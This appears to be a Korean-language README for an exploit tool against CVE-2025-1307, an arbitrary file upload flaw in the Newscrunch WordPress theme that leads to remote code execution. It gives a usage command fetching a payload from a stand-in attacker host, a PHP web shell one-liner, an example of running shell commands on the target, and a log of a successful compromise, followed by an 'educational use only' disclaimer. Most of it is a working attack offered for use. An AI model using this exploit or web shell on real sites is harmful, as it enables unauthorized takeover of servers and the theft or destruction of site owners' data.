
Newscrunch <= 1.8.4 - 인증된 (구독자+) 임의 파일 업로드
이 익스플로잇은 Newscrunch WordPress 테마의 치명적인 취약점(CVE-2025-1307)을 대상으로 합니다. 이 결함은 newscrunch_install_and_activate_plugin() 함수의 기능 검사 누락으로 인해 **인증된 사용자(구독자 이상)**가 임의의 파일을 업로드할 수 있게 합니다. 이로 인해 **원격 코드 실행(RCE)**으로 이어져 영향을 받는 WordPress 사이트가 완전히 손상될 수 있습니다.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H악용 가능성: 을 가진 유효한 WordPress 계정이 필요합니다.
✅ CVE-2025-1307 자동 악용
✅ 취약한 테마 버전 자동 감지
✅ ZIP 페이로드 자동 추출 및 실행
✅ ZIP에서 셸 파일 이름을 동적으로 검색
✅ 악용 후 셸 사용 가능 여부 자동 확인
✅ 디버깅을 위한 깔끔하고 구조화된 로깅
Python 3.x가 설치되어 있는지 확인하고 필요한 종속성을 설치하세요:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
셸이 성공적으로 업로드되면 대상 시스템에서 원격 명령 실행이 가능합니다. 셸 파일은 ZIP 아카이브 안에 넣어야 하며, 악용 시 자동으로 추출됩니다.
PHP 셸(shell.php)이 ZIP 아카이브 안에 있는지 확인하세요. 그런 다음 익스플로잇을 사용하여 ZIP 파일을 업로드하세요.
<?php system($_GET['cmd']); ?>
브라우저에서 셸 URL에 cmd 매개변수를 추가하여 시스템 명령을 실행할 수 있습니다:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
이 도구는 교육 및 보안 연구 목적으로만 제공됩니다. 취약점을 무단으로 악용하는 것은 불법이며 법적 처벌을 받을 수 있습니다. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 책임감 있게 사용하세요.
제작: Nxploit | Khaled Alenazi